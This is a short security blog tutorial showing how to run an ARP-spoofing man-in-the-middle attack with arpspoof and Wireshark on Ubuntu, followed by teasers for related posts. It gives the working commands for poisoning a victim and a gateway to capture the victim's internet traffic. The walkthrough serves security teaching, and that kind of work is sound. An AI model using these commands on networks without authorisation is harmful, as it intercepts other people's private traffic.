Man-In-The-Middle (MITM) with arpspoof

Apr 8, 2020 by Thibault Debatty | 955 views

Offensive Security

In this post we show how to easily perform a L2 man-in-the-middle attack using arpspoof on a standard Ubuntu computer...


To install arpspoof you actually have to install the dsniff package:

sudo apt install dsniff

And you are done...


Before using arpspoof, you need to activate packet forwarding in your kernel:

sudo sysctl net.ipv4.ip_forward=1

The classical way to use arpspoof is the following:

sudo arpspoof -i <interface> -t <target> -r <gateway>


  • interface is your network interface that arpspoof has to use
  • target is the IP address of the victim
  • gateway is the IP address of the default gateway on the network
  • -r indicates that arpspoof should poison both the target and the default gateway, to capture traffic in both directions

For this example, we want to capture the traffic between a victim on our network (IP and the default gateway (IP Hence we will collect all traffic between the victim and the internet...

So now is the good moment to start wireshark and start collecting traffic. To see only traffic related to victim (and not our own traffic), we can use the following filter in wireshark:

ip.addr ==

At first very few or no packets are captured (only broadcast packets).

Now, in a terminal, let's start arpspoof:

sudo arpspoof -i enp0s3 -t -r

After a few seconds, packets start to appear in wireshark... We can now start analyzing the traffic between the victim and the internet!

New ways to run Kali Linux on Windows using WSL
Some time ago I wrote a blog about Installing Linux Bash Shell (and Metasploit) on Windows 10. This is great, when we want to enjoy the best of both worlds- keep using Windows, with its out-of-the-box configuration and set-up, and still be able to use the powerful tools available for the Linux distribution. In my previous blog I went through the steps necessary for setting up WSL and installing an Ubuntu and Kali Linux distribution. Since then, a lot of advancements have been made to facilitate the use of these distributions for Windows Users.
Running and Imaging with FTK Imager from a flash device
In the process of analyzing a suspicious machine, the first thing we need to do is to actually image the machine we want to investigate. There are different tools available to do this, but the one I most often use is FTK Imager by AccessData. The FTK Imager tool is easy to use and more importantly, there is a free version.
Change the MAC address of your Linux system
Still today, some network monitoring tools and security systems rely on the MAC address of the host. However, a MAC address is not an authentication mechanism! It can be easily changed. More precisely, by default most operating systems will use the MAC address burnt into the network interface as the source MAC address for all emitted Ethernet frames. But you can easily reconfigure your system to change this behavior. Here is how to do that on a Linux computer.